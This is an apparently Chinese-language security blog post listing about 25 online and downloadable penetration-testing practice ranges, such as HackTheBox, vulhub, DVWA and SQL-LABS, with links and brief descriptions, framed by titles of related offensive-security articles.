一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透 

2025最新渗透测试靶场推荐，新手必练的靶场推荐 继上一篇渗透测试中新手必练的15个靶场，这次又新增了十个常用的靶场平台，帮助师傅们在学习渗透测试的路上不迷路，在开始之前呢推荐一个永久的渗透测试知识库，点击下方链接领取领取地址1、cyberstrikelab网址：https://www.cyberstrikelab.com/CyberStrikeLab 是一个专注于网络安全的在线仿真实战平台，由经验丰富的红队人员打造，以实战、系统、便利为特色，其靶机根据多年实战案例搭建，能帮助学习者提升网络安全实战技能。2、hackthebox网址：https://app.hackthebox.com/Hack The Box 是一个国际知名的网络安全渗透测试实战靶场平台，提供在线的渗透测试环境与挑战，帮助网络安全学习者与从业者提升实战技能。3、hackmyvm网址：https://hackmyvm.eu/HackMyVM 是一个国际性的网络安全靶场平台，提供多种虚拟机镜像靶机，用户可使用 VMware 或 VirtualBox 运行，挑战目标是获取操作系统的 root 权限和查看 flag。其靶机涵盖从入门到高阶的难度，适合不同水平的渗透测试爱好者学习与练习。4、Root Me网址：https://www.root-me.org/Root Me 是一个国际知名且免费的在线网络安全学习平台，提供CTF风格的网络安全挑战，涵盖密码学、WEB、脚本、网络、编程等内容的靶场，适合中高级学习者。5、Try Hack Me网址：https://tryhackme.com/Try Hack Me 是一个适合初学者的在线网络安全学习平台，提供结构化的课程、实战靶场和 CTF 挑战，帮助用户提升从基础到高级的网络安全技能。包括windows和linux的靶场渗透。6、vulfocus网址：https://vulfocus.cn/Vulfocus 是一个漏洞集成平台，将漏洞环境 docker 镜像放入即可使用，开箱即用，可用于漏洞复现、POC 验证、EXP 验证等，它由白帽汇推出，本质上是一个漏洞靶场。7、vulhub网址：https://github.com/vulhub/vulhubVulhub 是一个开源的漏洞靶场项目，基于 Docker 和 Docker-Compose 技术，提供一系列预构建的漏洞环境，用户可以快速搭建和测试各种漏洞场景，适合中高级学习者进行漏洞复现和研究8、vulnhub网址：https://www.vulnhub.com/和hackmyvm类似，是一个开源漏洞靶场项目，基于 Docker 和 Docker-compose 技术，提供一系列预构建的漏洞环境，用户可快速搭建和测试各种漏洞场景，适合中高级学习者进行漏洞复现和研究。9、XCTF攻防世界网址：https://adworld.xctf.org.cn/XCTF 攻防世界是一个专注于网络安全的在线平台，提供大量高质量的 CTF 题目和实训环境，适合不同水平的学习者提升实战技能。10、XSS小游戏网址：https://xss.haozi.me/#/xss学习必备的小游戏11、墨者学院网址：https://www.mozhe.cn/墨者学院是一个专业的网络安全在线靶场平台，专注于实战技能培养，适合网络安全学习者提升攻防能力。12、封神台网址：https://hack.zkaq.cn/封神台是掌控安全推出的一个在线攻防演练靶场，专注于网络安全渗透测试演练，适合网络安全学习者和从业者进行实战技能提升13、春秋云镜https://yunjing.ichunqiu.com/春秋云镜是一个专注于实战化的网络安全攻防演练靶场平台，提供了多样化的漏洞环境和场景，以帮助用户提升网络安全技能和攻防实战能力。14、玄机靶场https://xj.edisec.net/玄机靶场是一个专业的网络安全实验平台，提供多样化的攻击场景库和丰富的题库，涵盖渗透测试、应急响应、CTF竞赛等领域，适合不同层次的学习者进行实战训练，提升网络安全技能。15、红日靶场http://vulnstack.qiyuanxuetang.net/vuln/红日靶场是一个由红日安全团队打造的网络安全靶场平台，其特点是提供模拟真实企业内网的环境，涵盖域控、黄金票据等高级内网渗透场景，适合具备一定基础的学习者进行实战训练。靶场通过虚拟机镜像形式提供，需本地部署使用16、ctfhubhttps://www.ctfhub.com/CTFHub 是一个专注于信息安全竞赛的在线学习平台，提供题目练习、赛事跟踪等服务，适合 CTF 爱好者学习和提升技能。17、ctfshowhttps://ctf.show/CTFShow 是一个在线的网络安全学习平台，提供丰富的 CTF 题目和解题思路，适合 CTF 爱好者学习和提升技能。18、AltoroJhttps://demo.testfire.net/AltoroJ 是一个开源的银行应用程序，用于展示 Web 应用安全漏洞，适合网络安全学习者进行安全测试和教育训练。它包含多种漏洞，如 SQL 注入、跨站脚本攻击等，旨在帮助学习者深入了解 Web 应用的安全性问题和防御策略。19、vulnwebhttp://vulnweb.com/Vulnweb 是一个故意设置安全漏洞的 PHP 在线商店示例，用于测试网页漏洞扫描工具和技能，如 SQL 注入、跨站脚本攻击等。它模拟真实的漏洞环境，帮助开发者、安全研究人员和学生学习常见的 Web 应用安全漏洞20、XSS-LABhttps://vuln.longyusec.com/xss-labs是一个专注于跨站脚本攻击（XSS）学习和测试的开源靶场，提供多种XSS漏洞场景，帮助用户理解XSS攻击原理、掌握防御技巧，并通过实践提升安全意识和技能。21、SQL-LABShttps://vuln.longyusec.com/sql-libs是一个专门用于学习和测试SQL注入的开源平台，它提供了一系列的注入场景和关卡，帮助开发者和安全测试人员深入理解SQL注入的原理和防范方法。通过sql-libs，用户可以实践不同类型的SQL注入攻击，并学习如何编写安全的代码来避免这些漏洞。22、DVWAhttps://vuln.longyusec.com/DVWA是一个用于演示网页应用安全漏洞的开源软件平台，旨在帮助安全专业人士、学生及开发者理解并学习常见安全漏洞。它模拟了多种漏洞场景，如SQL注入、XSS等，提供安全测试环境。新手必练靶场之一。23、upload-labshttps://vuln.longyusec.com/upload-labs是一个使用PHP语言编写的，专门用于渗透测试和CTF中遇到的各种文件上传漏洞的靶场，旨在帮助用户深入了解文件上传漏洞的原理和防范措施。它提供了一系列模拟文件上传漏洞的实验环境，每个关卡都包含着不同的上传方式和挑战。24、mutillidaehttps://vuln.longyusec.com/Mutillidae 是一个免费、开源的 Web 应用程序安全漏洞靶场，由 OWASP 社区支持，包含丰富的渗透测试项目，如 SQL 注入、跨站脚本攻击、文件包含等，旨在帮助学习者理解和发现常见的 Web 应用安全问题。25、JAVA Sec Labhttps://github.com/whgojp/JavaSecLabJavaSecLab 是一款综合型 Java 漏洞平台，提供相关漏洞缺陷代码、修复代码、漏洞场景、审计 SINK 点、安全编码规范，覆盖多种漏洞场景，拥有友好用户交互 UI，适合安全研究人员、开发人员和安全服务人员学习和理解 Java 安全漏洞的生成、修复和审计过程。25、极核靶场https://hackhub.get-shell.com/games一个不错的靶场练习平台感谢师傅能看到这里再送一波福利，师傅们不想要一个一个看，那么我都准备好了，在longyusec.com中点击相关的链接就可以进入相应的靶场啦，如果还有比较热门的靶场没有提交到这，欢迎师傅们投稿往期推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等内网渗透，流量转发Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透